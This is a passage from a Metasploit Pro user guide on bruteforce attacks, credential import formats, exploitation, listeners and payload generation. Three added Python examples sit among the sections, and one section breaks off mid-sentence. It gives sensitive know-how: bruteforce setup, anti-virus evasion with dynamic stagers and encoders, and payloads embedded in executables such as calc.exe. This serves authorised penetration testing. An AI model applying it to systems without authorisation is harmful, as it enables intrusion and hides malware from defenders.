Mutation: substitute numbers within candidate password


Strips up to two digits from within a password and replaces them with up to two digits. Passwords with more than three digits are ignored.

Mutation: transpose letters for l33t-sp34k alternatives in candidate passwords


Rotates through a number of alpha to numeric substitutions before substituting all of them.

Mutation: append special characters to candidate passwords


Appends a punctuation mark to the end of a password or replaces an existing punctuation mark.

Mutation: prepend special characters to candidate passwords


Prepends a punctuation mark to the beginning of a password or replaces an existing punctuation mark.

Recombine known, imported, and additional credentials


Takes the user names and passwords from the known credentials list, imported list, and credentials text box, and assigns all the passwords to all users.

Include known credentials


Uses all known credentials from the project. The bruteforce attack tries the known passwords first. The Known Only and Quick depths are not affected by the credential generation switch.
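The mutation options above describe a handful of transformations: digits appended, prepended or substituted, letter-to-digit (l33t) swaps, and punctuation added at either end. A defender can apply the same classes in reverse to find which passwords in a set would fall to a bruteforce run with mutations enabled. The following Python checker is an added example, not Metasploit Pro code: it normalizes a candidate password through the inverse of each mutation class and reports the first blocklisted base word it reaches. The blocklist is constructed here from the Quick-depth passwords listed earlier plus a few extra words; the substitution table beyond the guide's "1 for I and 0 for O", the rule-stacking "combined" form, and all function names are mine.

```python
import re
import string

# Inverse of the digit-for-letter substitutions the guide mentions ("1 for I and
# 0 for O"). Entries beyond those two are an assumed extension, not Metasploit
# Pro's own table.
_UNLEET = str.maketrans(
    {"0": "o", "1": "i", "3": "e", "4": "a", "5": "s", "7": "t", "@": "a", "$": "s"}
)

# Passwords from the guide's Quick-depth static list, plus constructed extras.
QUICK_DEPTH_PASSWORDS = ["admin", "admin1", "admin!", "test", "test1234", "test123",
                         "cisco", "user", "administrator", "root", "toor"]
SAMPLE_BLOCKLIST = QUICK_DEPTH_PASSWORDS + ["password", "welcome", "letmein"]


def _normal_forms(password):
    """Yield (rule, base) pairs: the base word PASSWORD would come from if it
    had been produced by each mutation class described in the guide."""
    lowered = password.lower()
    digits, punct = string.digits, string.punctuation
    yield "exact", lowered
    if any(c.isalpha() for c in lowered):  # number rules skip letter-less words
        yield "append numbers", lowered.rstrip(digits)
        yield "prepend numbers", lowered.lstrip(digits)
        if 0 < sum(c.isdigit() for c in lowered) <= 2:  # "up to two digits within"
            yield "substitute numbers within", re.sub(r"\d", "", lowered)
    yield "l33t substitution", lowered.translate(_UNLEET)
    yield "append special characters", lowered.rstrip(punct)
    yield "prepend special characters", lowered.lstrip(punct)
    # Stacking the rules is an assumed extension: it catches "P@ssw0rd1!"
    # against "password", which no single rule above reaches.
    yield "combined", lowered.strip(digits + punct).translate(_UNLEET)


def trivial_mutation_of(password, blocklist):
    """Return (rule, base) when PASSWORD is a blocklisted word or a mutation of
    one under the rules above; otherwise None."""
    block = {w.lower() for w in blocklist}
    for rule, base in _normal_forms(password):
        if base in block:
            return rule, base
    return None


def audit_passwords(passwords, blocklist):
    """Map each password that a mutating bruteforce would guess to the
    (rule, base) pair that explains why."""
    findings = {}
    for pw in passwords:
        hit = trivial_mutation_of(pw, blocklist)
        if hit is not None:
            findings[pw] = hit
    return findings


if __name__ == "__main__":
    # Constructed sample of passwords a defender might be auditing.
    sample = ["admin7", "2cisco", "r00t", "toor!", "!welcome", "P@ssw0rd1!",
              "hunter22", "12345678", "Test1234"]
    for pw, (rule, base) in audit_passwords(sample, SAMPLE_BLOCKLIST).items():
        print(f"{pw!r}: {rule} of {base!r}")
```

Each reported password maps to exactly one rule, checked in the order the guide lists them, so the output tells you which single option a defender would need to care about; "hunter22" and "12345678" are not reported because no base word in the blocklist explains them.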

Target Services
After Metasploit Pro opens the session, you can select the services that you want to target in the bruteforce attack. You can target the following services:

- AFP
- DB2
- EXEC
- FTP
- HTTP
- HTTPS
- Login
- MySQL
- MSSQL
- Oracle
- POP3
- Postgres
- Shell
- SMB
- SNMP
- SSH
- SSH_PUBKEY
- Telnet
- VMAUTHD
- VNC
- WinRM

Running a Bruteforce Attack


Before you run a bruteforce attack, you must run a scan or data import first.

1. Open a project.
2. Click the Analysis tab.
3. Select the hosts that you want to run the bruteforce attack against.
4. Click Bruteforce. The Bruteforce window appears. Metasploit Pro automatically populates the target addresses field with the selected hosts.
5. Select the depth of the bruteforce attack.
6. Select the services that you want the bruteforce attack to target.
7. Click Show Advanced Options to configure additional options for the bruteforce attack.
8. Launch the bruteforce attack.

Running a Bruteforce Attack against a VM


You can run a bruteforce attack against vmauthd, the authentication daemon for VMware's virtual infrastructure client, and for VMware Web Service. If the bruteforce attack successfully guesses the credentials, then you can use the credentials to administer VMware. You cannot access VMware directly from Metasploit Pro. However, after you gain access to a virtual machine, you can run post-exploitation modules to identify more information about the machine, such as configuration settings, logins, and other virtual machines.

1. Open a project.
2. Click the Analysis tab.
3. Select the virtual target that you want to bruteforce.
4. Click Bruteforce. The Bruteforce window appears.
5. Metasploit Pro automatically populates the target address field with the vmauthd target address.
6. Launch the bruteforce attack.

Running a Bruteforce Attack with a Password List


Before you can run a bruteforce attack using an imported credential list, you must import the user name and password list. To import credentials, click the Manage Credentials button and select the file that you want to upload.

1. Open a project.
2. Click the Analysis tab. The Hosts page appears.
3. Select the hosts that you want to run the bruteforce attack against.
4. Click Bruteforce. The Bruteforce window appears.
5. Metasploit Pro automatically populates the target addresses field with the selected hosts.
6. Select Imported Only for depth of the bruteforce attack.
7. Select the services that you want the bruteforce attack to target.
8. Launch the bruteforce attack.

Running a Bruteforce Attack with a Single Credential


1. Open a project.
2. Click the Analysis tab.
3. Select the hosts that you want to test the credential against.
4. Click Bruteforce. The Bruteforce window appears. Metasploit Pro automatically populates the target addresses field with the hosts that you chose.
5. Select Quick for depth of the bruteforce attack.
6. Select the services that you want the bruteforce attack to target.
7. Click Show Advanced Options to configure additional options for the bruteforce attack.
8. Enter the credential that you want to use for the bruteforce attack in the Additional Credentials field. For example, enter admin admin.
9. Launch the bruteforce attack.

Importing a Password List


All credential files, or custom word lists, must use a newline delimited format.

1. Open a project.
2. Click the Analysis tab. The Host window appears.
3. Select the hosts that you want to include in the bruteforce attack.
4. Click Bruteforce.
5. Click Manage Credentials. The Credential Import page appears.
6. Click Browse to navigate to the location of the credentials file. The credentials file must be in plain ASCII.
7. Click Open after you select the credentials file.
8. Select the type of content that the list contains. The file type can be UserPass, Usernames, Passwords, PWDump, or SSH key. For example, choose Usernames if the list contains only user names or Passwords if the list contains only passwords.
9. Enter a name for the imported file.
10. Enter a description for the imported file.
11. Upload the file.


Credential Management
You can import sets of untested credentials into Metasploit Pro. Use imported credentials when you run the scan in normal, deep, or imported only mode. If you import multiple files, Metasploit Pro consolidates the credentials from each file and stores the data within a single, running file. The imported credentials do not display under the credentials area. To view the imported credentials, you can download the imported credentials as a single text file.

Note: You should use the Additional Credentials option for known credentials or for bruteforce attacks that use the Include known credentials option.

Supported Credential Formats


For imported credential files, you can add spaces and any other special characters to passwords by specifying them as \x20 or any other hex value -- \x09 for tab, \x90 for a password with a NOP. If you have a password that contains the string \x20, you can use \x5cx20 to protect the password. Metasploit Pro supports the following credential file formats:

PWDump
A PWDump file can contain SMB hashes and space delimited user name and password pairs. Each item must be on a separate line. The bruteforce attack attempts the SMB hash credentials against services that accept SMB hashes as plain text. When you use a PWDump file, you must define the SMB domains to target services that accept Windows authentication. When you use a PWDump file, use the imported only bruteforce depth to test only this list of credentials. Use this format if you have exported a Metasploit PWDump.

Example:
administrator:501:de8130a284642c74523fa0f66c35ef02:421a1c7abc7b160c20ed78a2e06e09c8:::

User names and passwords


A user name and password file is a text file that contains a user name and password on each line. You must use a space to separate the user name and password. User names and passwords can contain non-ASCII in \xXX notation. For example, you can denote spaces within a user name or password as \x20. When you use a user name and password file, use the imported only bruteforce depth to test only this list of credentials. Use this format if you have a list of user names and passwords.

Example:
username1 passwordA
username2 passwordA passwordB
username3 passwordA passwordB passwordC

Passwords only
A passwords only file is a text file that contains only passwords. There can be only one password for each line in the file. Metasploit Pro assigns the passwords to known user names. Passwords can contain non-ASCII in \xXX notation. For example, you can enter testuser d\xeadb\xeef. When you use a plain password file, do not use the imported only bruteforce depth. You must choose a different bruteforce depth so that Metasploit Pro can assign a user name to each password. Use the plain password format if you have a list of passwords and you want Metasploit Pro to specify user names to test against.

Example:
password1
password2
password3

User names only


A user names only file is a text file that contains only user names. There can be one user name for each line in the file. Metasploit Pro assigns the user names to common passwords. User names can contain non-ASCII in \xXX notation. For example, you can enter testuser d\xeadb\xeef. When you use a user names only file, do not use the imported only bruteforce depth. You must choose a different bruteforce depth so that Metasploit Pro can assign a password to each user name.

Example:
jack
joe
john
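The four formats above, parsed in Python as an added example (this is not Metasploit Pro code): one parser per file type, the \xXX escape expansion including the \x5cx20 rule, and the every-password-to-every-user assignment that the passwords-only and user-names-only imports rely on. The sample file contents are constructed; the PWDump line is the one shown above.

```python
import re
from itertools import product
from typing import Dict, List, Tuple, Union

# Added example, not Metasploit Pro code: parsers for the credential import
# formats described in the text, with the \xXX escape rules applied.

_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
_HASH = re.compile(r"^[0-9a-fA-F]{32}$")


def decode_escapes(token: str) -> str:
    """Expand each \\xHH sequence into one character (Latin-1 code point).

    A single left-to-right pass means \\x5cx20 becomes a backslash followed by
    the literal text x20, which is the "protect the password" rule in the text.
    """
    return _ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), token)


def parse_userpass(text: str) -> List[Tuple[str, str]]:
    """User name followed by one or more space-separated passwords per line."""
    pairs: List[Tuple[str, str]] = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        # A literal space is the delimiter; \x20 is still text at this point.
        fields = [f for f in raw.split(" ") if f]
        if not fields:
            continue  # blank line
        if len(fields) < 2:
            raise ValueError(f"line {lineno}: expected 'user password', got {raw!r}")
        user = decode_escapes(fields[0])
        pairs.extend((user, decode_escapes(pw)) for pw in fields[1:])
    return pairs


def parse_single_column(text: str) -> List[str]:
    """Passwords-only or user-names-only file: exactly one entry per line."""
    return [decode_escapes(line.strip()) for line in text.splitlines() if line.strip()]


def parse_pwdump_line(line: str) -> Dict[str, str]:
    """user:rid:lmhash:nthash::: as in the PWDump example in the text."""
    parts = line.rstrip(":").split(":")
    if len(parts) != 4:
        raise ValueError(f"not a PWDump entry: {line!r}")
    user, rid, lm, nt = parts
    if not (rid.isdigit() and _HASH.match(lm) and _HASH.match(nt)):
        raise ValueError(f"malformed RID or hash field: {line!r}")
    return {"user": user, "rid": rid, "lm": lm.lower(), "nt": nt.lower()}


def parse_pwdump(text: str) -> List[Union[Dict[str, str], Tuple[str, str]]]:
    """A PWDump file mixes hash lines with plain 'user password' lines.

    Assumption: a line containing ':' is a hash entry; any other non-blank
    line is a space-delimited user name and password pair.
    """
    entries: List[Union[Dict[str, str], Tuple[str, str]]] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if ":" in line:
            entries.append(parse_pwdump_line(line.strip()))
        else:
            entries.extend(parse_userpass(line))
    return entries


def recombine(users: List[str], passwords: List[str]) -> List[Tuple[str, str]]:
    """Assign every password to every user (N users x M passwords pairs), as the
    Recombine option and the single-column imports do."""
    return list(product(users, passwords))


# Constructed sample files (not from a real engagement).
USERPASS_SAMPLE = (
    "username1 passwordA\n"
    "username2 passwordA passwordB\n"
    "svc\\x20acct p\\x40ss\\x20word\n"  # space and '@' written as hex escapes
    "literal \\x5cx20kept\n"           # password that really contains \x20
)
PASSWORDS_SAMPLE = "password1\npassword2\nd\\xeadb\\xeef\n"
USERNAMES_SAMPLE = "jack\njoe\njohn\n"
PWDUMP_SAMPLE = (
    "administrator:501:de8130a284642c74523fa0f66c35ef02:"
    "421a1c7abc7b160c20ed78a2e06e09c8:::\n"
    "guest guest\n"
)

if __name__ == "__main__":
    for user, pw in parse_userpass(USERPASS_SAMPLE):
        print(f"{user!r} -> {pw!r}")
    print(parse_pwdump(PWDUMP_SAMPLE))
    pairs = recombine(parse_single_column(USERNAMES_SAMPLE),
                      parse_single_column(PASSWORDS_SAMPLE))
    print(len(pairs), "user/password pairs to try")
```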


Word Lists
A word list is an exhaustive list of common passwords and terms that a bruteforce attack or password cracker can use to attempt to guess the login credentials for a particular account. By default, Metasploit Pro provides several different word lists, but you can add your own custom word lists for the bruteforce attack to use.

Importing a Custom Word List


All credential files, or custom word lists, must use a newline delimited format.

1. Open a project.
2. Click the Analysis tab. The Host window appears.
3. Select the hosts that you want to include in the bruteforce attack.
4. Click Bruteforce.
5. Click Manage Credentials. The Credential Import page appears.
6. Click Browse to navigate to the location of the credentials file. The credentials file must be in plain ASCII.
7. Click Open after you select the credentials file.
8. Select the type of content that the list contains. The file type can be UserPass, Usernames, Passwords, PWDump, or SSH key. For example, choose Usernames if the list contains only user names or Passwords if the list contains only passwords.
9. Enter a name for the imported file.
10. Enter a description for the imported file.
11. Upload the file.

Selecting a Custom Word List


After you import a credential file or custom word list, you can select the file that you want the bruteforce attack to use.

1. Open a project.
2. Click the Analysis tab. The Host window appears.
3. Select the hosts that you want to include in the bruteforce attack.
4. Click Bruteforce.
5. Choose the depth and services for the bruteforce attack.
6. Click Show Advanced Options and configure any additional options for the bruteforce attack.
7. Under Credential Selection, locate the Imported Credential Files list. Select the credential file, or keyword list, that you want to use.
8. Run the bruteforce attack.

Viewing Imported Credentials


1. Open a project.
2. Click the Overview tab.
3. Click Bruteforce. The Bruteforce window appears.
4. Click Manage Credentials. The Credential Import window appears.
5. Locate the credentials that you want to view and click Download.
6. Save the file to a location on your computer.

Viewing Metasploit Word Lists


The word lists are available in the following locations:

• $INSTALL/apps/pro/data/wordlists
• $INSTALL/apps/msf3/data/john/wordlists
• $INSTALL/nmap/nselib/data
• $INSTALL/apps/pro/msf3/data/wordlists

Deleting Imported Word Lists


1. Open a project.
2. Click the Overview tab.
3. Click Bruteforce. The Bruteforce window appears.
4. Click Manage Credentials. The Credential Import window appears.
5. Locate the credentials that you want to view.
6. Click Delete for each file that you want to delete.


Chapter 10:

Exploitation

To learn more about exploitation, read the following topics:


• About Exploitation on page 235
• Components of an Exploit on page 237
• Common Exploitation Tasks on page 238
• Automated Exploits on page 235
• Manual Exploits on page 235

About Exploitation
An exploit executes a sequence of commands that target a specific vulnerability found in a system or application to provide the attacker with access to the system. Exploits include buffer overflow, code injection, and web application exploits. Metasploit Pro offers automated exploits and manual exploits. The type of exploit that you use depends on the level of granular control you want over the exploits.

Automated Exploits
When you run an automated exploit, Metasploit Pro builds an attack plan based on the service, operating system, and vulnerability information that it has for the target system. Automated exploits cross reference open ports, imported vulnerabilities, and fingerprint information with exploit modules. The attack plan defines the exploit modules that Metasploit Pro will use to attack the target systems. An automated exploit uses reverse connect or bind listener payloads and does not abuse normal authenticated control mechanisms.

To run an automated exploit, you must specify the hosts that you want to exploit and the minimum reliability setting that Metasploit Pro should use. The minimum reliability setting indicates the potential impact that the exploits have on the target system. If you use a high ranking, such as excellent or great, Metasploit Pro uses exploits that will be unlikely to crash the service or system. Exploits that typically have a high reliability ranking include SQL injection exploits, web application exploits, and command execution exploits. Exploits that corrupt memory will most likely not have a high reliability ranking.

You can also specify the payload type that you want the exploit to use. By default, automated exploits use Meterpreter, but you can choose to use a command shell instead.

Manual Exploits
A manual exploit is a module that you can select and run individually. You perform a manual exploit when you want to exploit a known vulnerability. You choose the exploit module based on the information you have about the host. For example, if you know that the host runs Windows Service Pack 1, you can run an exploit that targets Windows Service Pack 1 vulnerabilities. Or if you know that the target system has a specific vulnerability that you want to test, you can run the exploit that targets that particular weakness.


Manual exploitation provides granular control over the module and evasion options that an exploit uses. Whereas automated exploits enable you to run multiple exploits simultaneously, manual exploits enable you to run one exploit at a time. The options and instructions that you perform for manual exploits vary based on the exploit that you choose to run. Therefore, use the following instructions as a guideline to manually run exploits.

Manual Exploits Workflow Overview


The following steps provide an overview of the steps you need to take to manually exploit targets:

1. Create a list of system targets.
2. Create a map of all available exploits using references, ports, and service names.
3. Create a match table of exploits for systems, but do not include devices that are fragile or devices that cannot be exploited.
4. Create a prioritized queue of exploit modules based on reliability and interleave exploits between hosts.
5. Execute exploit modules until Metasploit Pro obtains a session.


Components of an Exploit
The following sections describe the different components that make up an exploit.

Module
A module is a prepackaged collection of code that performs a specific task, such as running an Nmap scan or a particular exploit.

Payload
A payload is the actual code that executes on the target system after an exploit successfully executes. There are a couple of types of payloads: reverse shell and bind shell. The major difference between a reverse shell and a bind shell is how the shell enables you to connect to the exploited system. A reverse shell creates a connection from the target machine back to you as a command prompt. A bind shell, on the other hand, attaches a command prompt to a listening port on the exploited system. You can connect to the bind shell to access the exploited system.

Listeners
After an exploit successfully compromises a target system, Metasploit Pro uses a listener to wait for an incoming connection from the exploited system. The listener is the component that handles persistent agents from exploited systems. When you create a listener, you associate the listener to a specific project. Therefore, when an exploited target makes a connection with the listener, you see an active session open in the project.

Note: You can create global listeners that you can use across multiple projects. However, only one project can use the listener at a time.

You assign a post-exploitation macro to each listener. When the exploited system makes a connection with the attacking system, Metasploit Pro launches the post-exploitation macro. Listeners stop after you delete a project or you manually stop a listener.


Common Exploitation Tasks


The following sections describe the most commonly performed exploitation tasks.

• Searching for Exploits
• Setting Up a Listener
• Running a Single Exploit
• Running Automated Exploitation
• Enabling or Disabling a Listener
• Stopping a Listener

Searching for Exploits


The module search engine searches the module database for the keyword expression and returns a list of results that match the query. Use the module search engine to find the module that you want to run against a target system.

1. From within a project, click the Modules tab.
2. In the Search Modules field, enter a keyword expression to search for a specific exploit.
3. Use the keyword tags to define the keyword expression.
4. Press Enter to perform the search.

Running Automated Exploits


1. From within a project, click the Analysis tab.
2. When the Hosts window appears, select the hosts that you want to exploit.
3. Click Exploit.
4. When the New Automated Exploitation Attempt window appears, verify that the target address field contains the addresses that you want to exploit.
5. Select the minimum reliability for the exploit.
6. Click Show Advanced Options.
7. Define the target hosts that you want to include or exclude from the exploit.
8. Define the payload options. This determines the type of payload the exploit uses, the type of connection the payload creates, and the listener ports that the exploit uses.
9. Define the exploit selection options. This determines the ports that the exploit includes and excludes from the attack.
10. Define the advanced options. The advanced options let you define the number of exploits you can run concurrently, the time out for each exploit, and evasion options.
11. Run the exploit.

Running a Single Exploit


1. From within a project, click the Modules tab.
2. Use the search engine to find a specific module.
3. Use the keyword tags to define the search term.
4. Click on a module name to select the module.
5. When the Module window appears, define the target hosts that you want to include or exclude from the exploit.
6. Define the payload options, if the options are available.
7. Define the module options. Note: Module options vary between modules. Use the in-product help to view descriptions for each option.
8. Define the advanced options. Note: Advanced options vary between modules. Use the in-product help to view descriptions for each option.
9. Define the evasion options. Note: Evasion options vary between modules. Use the in-product help to view descriptions for each option.
10. Launch the exploit.

Setting Up a Listener
1. Select Administration > Global Settings from the main menu.
2. Click New Listener, which is located under Persistent Listeners.
3. When the Create a Listener window appears, choose an associated project for the listener.
4. Define the listener payload type.
5. Enter an IP address for the listener.
6. Enter a port for the listener.
7. Choose a post-exploitation macro to deploy after the listener connects to the target system. Enable the listener.
8. Save the listener.

Enabling and Disabling a Listener


1. Select Administration > Global Settings from the main menu.
2. When the Global Settings window appears, click on a listener from the Scope column.
3. Select or deselect the Enabled option.
4. Update the listener.

Stopping a Listener
To stop a listener, you can either delete the listener from the system or you can stop the listener from the Task screen.

1. From within a project, click the Tasks tab.
2. Find the listening tasks.
3. Click the Stop button in the Timestamp/Duration column.


Chapter 11:

Payloads

To learn more about payloads, read the following topics:


• The Payload Generator on page 242

The Payload Generator


The Payload Generator enables you to create a properly formatted executable that you can use to deliver shellcode to a target system without the use of an exploit. The Payload Generator provides a guided interface that walks you through the process of generating a dynamic payload or a classic payload. Depending on the type of payload you choose to build, it will display the applicable options that you can use to customize the payload.


You use the Payload Generator when you need to build a standalone binary file that delivers a custom-built payload. Binary files, such as .exe and .bin files, are typically delivered through client-side exploits, such as phishing e-mails or social engineering attacks, which means that you will probably need to be able to bypass anti-virus detection to execute the shellcode on the target system. To help reduce anti-virus detection, the Payload Generator enables you to do things like encode the payload and use a dynamic executable.

Payloads are generated globally, outside the context of a project. This means that payloads are generated on the fly, can only be downloaded once, and are not tied to a particular project. They are useful when you need to quickly generate an executable payload for a single use.


Accessing the Payload Generator


You access the Payload Generator from the Global Tools area of the web interface. To access the Payload Generator, go to the Projects List. Find the Global Tools area and click on the Payload Generator widget to launch it.

Building Dynamic Payloads


The Payload Generator enables you to build a Windows executable that uses a dynamic stager that is written entirely in randomized C code. The dynamic stager does not use an executable template or shellcode, which allows it to behave similarly to a standard Windows application. The resulting executable is different each time it is generated, so that anti-virus software will not be able to identify the stager as Metasploit shellcode.

Note: Metasploit Pro offers dynamic payloads for Windows platforms only. These payloads are compatible with any Windows x86 and x86_64 system.

Dynamic Payload Options


You can use the following common options to build a dynamic payload:

Type of Payload
Specifies the type of payload that the exploit will deliver to the target. Choose one of the following payload types:
• Command - A command execution payload that enables you to execute commands on the remote machine.
• Meterpreter - An advanced payload that provides a command line that enables you to deliver commands and inject extensions on the fly.

Stager
Specifies the type of stager that the payload will use to set up the network connection between the target machine and the payload handler running on the Metasploit server. The stager enables you to use a smaller payload to load and inject a larger, more complex payload called the stage. Choose one of the following stagers:
• Reverse TCP - Creates a connection from the target machine back to the Metasploit server over TCP.
• Bind TCP - Binds a command prompt to a listening port on the target machine so that the Metasploit server can connect to it.
• Reverse HTTP - Creates a connection from the target machine back to the Metasploit server over HTTP.
• Reverse HTTPS - Creates a connection from the target machine back to the Metasploit server over HTTPS.

Stage
Specifies the payload that is delivered by the stager.

LHOST
Defines the IP address the payload connects back to. (Reverse connections only)

LPORT
Defines the port the payload connects back to.

RHOST
Defines the port that the listener binds to. (Bind connections only)

Generating Dynamic Payloads


1. From the Projects page, launch the Payload Generator.
2. Select the Dynamic Payload option.
3. Click the Stager dropdown and choose one of the following: Reverse TCP, Bind TCP, Reverse HTTP, or Reverse HTTPS.
4. Click the Stage dropdown and choose the stage you want the stager to download. The list will display applicable stages for the stager you have selected.
5. Enter the IP address that you want the payload to connect back to in the LHOST field. (Reverse connections only)
6. Enter the port that you want the payload to connect back to in the LPORT field.
7. Enter the port that you want the listener to bind to in the RHOST field. (Bind connections only)
8. Click Generate. If the payload generates without error, a window appears and alerts you that the payload has been generated and is ready for you to download. Click Download Now to automatically download the executable.

If your browser is not configured to automatically download files, a dialog window will appear and prompt you to save or run the file. You will need to save the executable to your computer.

Building Classic Payloads


A classic payload is built the traditional way--from scratch. The Payload Generator is particularly useful when you need to build a payload in various formats and encode them with different encoder modules. You can build a variety of payloads based on the operating system, architecture, type of connection, and output format that you need for a particular host.

Classic Payload Options


The following table describes the most common options that are available for classic payloads:

Platform
Specifies the platform. The following platforms are supported: AIX, Android, BSD, BSDi, Firefox, Java, Linux, Netware, NodeJS, OSX, PHP, Platform, Python, Ruby, Solaris, Unix, and Windows.

Architecture
Specifies the processor architecture. The Payload Generator shows you the options that are available for the architecture you have selected. The following architectures are supported:
• AIX
• Android
• BSD - sparc and x86
• BSDi
• Firefox
• Java
• Linux - armle, cbea, cbea64, java, mipsbe, mipsle, ppc, ppc64, x86, and x86_64
• Netware
• NodeJS
• OSX - armle, java, ppc, x86, and x86_64
• PHP - armbe, armle, cbea, cbea64, cmd, dalvik, firefox, java, mips, mipsbe, mipsle, nodejs, php, ppc, ppc64, python, ruby, sparc, x86, and x86_64
• Solaris - java, sparc, and x86
• Unix - cmd, java, and tty
• Windows - cmd, java, x86, and x86_64

Payload
Specifies the type of payload that the exploit will deliver to the target. The Payload Generator shows you the payloads that are available for the platform you have selected.

Stager
Specifies the type of stager that the payload will use to set up the network connection between the target machine and the payload handler running on the Metasploit server. The stager enables you to use a smaller payload to load and inject a larger, more complex payload called the stage. The list of stagers that are available will vary based on the platform and architecture that you have selected.

Exit Function
Specifies the function to call when a payload completes so that it can safely exit a thread. Choose one of the following exit functions:
• Thread - Calls the ExitThread API function.
• Process - Calls the ExitProcess API function.
• SEH - Restarts the thread when an error occurs.
• None - Enables the thread to continue executing so that you can serially run multiple payloads together.

Listener Host
Defines the IP address that you want the target host to connect back to.

Listener Port
Defines the port that you want to use for reverse connections.

Added Shellcode
Enables you to specify an additional shellcode file that will run in a separate, parallel thread while the main thread executes the payload.

Size of NOP Sled
Defines the length of the NOP sled you want to prepend to the payload. Each NOP you add to the payload adds 1 byte to the total payload size.

Note: The options that are available for a payload vary based on its architecture, platform, and payload type.

Building Classic Payloads

247

Encoding the Payload


An encoder enables you to eliminate bad characters from a payload so that you can use it with a particular exploit. A character is considered to be bad if some aspect of the exploit makes it impossible to use. For example, many applications interpret a null byte as the end of a string. If it appears anywhere in the payload, the shellcode will terminate before it completes and cause the payload to fail. In this particular case, you can apply an encoder that removes null bytes from the payload. An encoder does not guarantee that a payload will evade anti-virus detection, but it will ensure a payload does not contain bad characters that can cause issues with an exploit or produce unintended results. The following are examples of common bad characters:

• Spaces
• Carriage returns
• Line feeds
• Tabs
• Null bytes

There are many different encoders that are available in the Metasploit Framework, which can be used for various situations. For example, some encoders, such as alpha_mixed and alpha_lower, can be used to replace characters with all alphanumeric characters, which can be useful for applications that only accept text-based characters as input. Other encoders, such as the very reliable and highly ranked shikata_ga_nai, are polymorphic XOR encoders that use an XOR encrypting scheme to help evade detection. Encoding options are only available for the following platforms:

• AIX
• BSD sparc
• BSD x86
• BSDi
• Linux mipsbe
• Linux mipsle
• Linux ppc
• Linux x86
• Linux x86_64
• Netware
• OSX ppc
• OSX x86
• OSX x86_64
• PHP
• Platform sparc
• Platform x86
• Platform x86_64
• Python cmd
• Solaris sparc
• Solaris x86
• Unix cmd
• Windows cmd
• Windows x86
• Windows x86_64


Encoding Options
You can use the following options to encode a payload:

Encoder
Sets the encoder that is used to encode the payload. The Payload Generator only displays the encoders that are applicable to the platform and architecture you have selected.

Number of Iterations
Specifies the number of times that you want to encode the payload. The more times you encode a payload, the larger the payload becomes. You may need to modify the number of iterations if it causes the payload to exceed the maximum payload size.

Maximum Size of Payload
Defines the maximum size of the resulting payload in bytes. The maximum size takes precedence over the encoding iterations. If the encoder causes the payload to exceed the maximum size you have specified, the Payload Generator will display an error message. To fix the error, you can select a new encoder, modify the number of iterations, or set a different maximum payload size.

Bad Characters
Specifies the list of characters that you do not want to appear in the payload, such as spaces, carriage returns, line feeds, tabs, and null bytes. You must enter the values in hex. You can copy and paste the hex characters into the text box. The text editor will attempt to format the hex
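As an added illustration, not the Metasploit encoder and not shikata_ga_nai, this Python models a single-byte XOR encoder over constructed sample bytes (not shellcode): it parses the Bad Characters field as hex, reports where bad bytes occur, finds a key that removes them, shows why each extra iteration grows the output, and enforces a Maximum Size limit as described above.

```python
import re
from typing import List, Optional, Tuple

# Added illustration, not Metasploit code: a toy single-byte XOR encoder
# showing how bad characters, iterations and maximum size interact.

_HEX = re.compile(r"\\x([0-9a-fA-F]{2})")


def parse_bad_chars(spec: str) -> bytes:
    """Parse the Bad Characters field as typed, e.g. '\\x00\\x0a\\x0d'."""
    spec = spec.strip()
    found = _HEX.findall(spec)
    if len(found) * 4 != len(spec):  # every character must belong to a \xHH token
        raise ValueError(f"bad characters must be \\xHH values only: {spec!r}")
    return bytes(int(h, 16) for h in found)


def find_bad_chars(payload: bytes, bad: bytes) -> List[Tuple[int, int]]:
    """Return (offset, value) for every payload byte that is on the bad list."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]


def find_xor_key(payload: bytes, bad: bytes) -> Optional[int]:
    """Smallest key such that neither the key nor any encoded byte is bad."""
    for key in range(1, 256):
        if key not in bad and all((b ^ key) not in bad for b in payload):
            return key
    return None


def _xor(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def encode(payload: bytes, bad: bytes, iterations: int = 1,
           max_size: Optional[int] = None) -> Tuple[bytes, List[int]]:
    """Apply 'iterations' rounds of XOR; each round prepends its key byte.

    The output grows by one byte per round (a real decoder stub adds more),
    which is the Number of Iterations effect; the max_size check mirrors
    Maximum Size of Payload taking precedence over the iteration count.
    """
    keys: List[int] = []
    data = payload
    for _ in range(iterations):
        key = find_xor_key(data, bad)
        if key is None:
            raise ValueError("no single-byte key avoids the bad characters")
        data = bytes([key]) + _xor(data, key)
        keys.append(key)
    if max_size is not None and len(data) > max_size:
        raise ValueError(f"encoded size {len(data)} exceeds maximum {max_size}")
    return data, keys


def decode(data: bytes, iterations: int) -> bytes:
    """Undo encode(): strip the leading key byte and XOR the rest, per round."""
    for _ in range(iterations):
        data = _xor(data[1:], data[0])
    return data


# Constructed sample bytes (not shellcode) containing every common bad char.
SAMPLE = bytes([0x31, 0xC0, 0x00, 0x0A, 0x0D, 0x09, 0x20, 0x41, 0x42, 0xFF])
BAD_SPEC = r"\x00\x0a\x0d\x09\x20"

if __name__ == "__main__":
    bad = parse_bad_chars(BAD_SPEC)
    print("bad bytes present:", find_bad_chars(SAMPLE, bad))
    out, keys = encode(SAMPLE, bad, iterations=2)
    print("keys:", keys, "size:", len(SAMPLE), "->", len(out))
    print("bad bytes after encoding:", find_bad_chars(out, bad))
    print("round trip ok:", decode(out, 2) == SAMPLE)
```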

Output Options
You can use the following options to create the binary file:

Format
Specifies the format to use to output the payload. Choose from the following formats: executable, raw bytes, or shellcode buffer.

Preserve original functionality of executable
Enables you to inject the payload into an existing executable and retain the original functionality of the original executable. The resulting executable will function like the original one. You should only enable this option if you have uploaded a template file.

Template file
Specifies the executable template that you want to use to run in the main thread. For example, you can embed the payload in an executable, like calc.exe. When the executable runs, it creates a separate thread for the payload that runs in the background and continues to run calc.exe in the main thread.

Generating a Classic Payload


The configuration of a classic payload will vary based on the platform, architecture, payload, stager, and stage that you have selected. The following instructions provide an overview of the steps that you need to perform to generate a classic payload, such as a Linux Meterpreter Reverse TCP payload.

1. From the Projects page, launch the Payload Generator.
2. Select the Classic Payload option.
3. Click the Platform dropdown button and choose one of the available platforms. For a list of supported platforms, see Classic Payload Options on page 246.
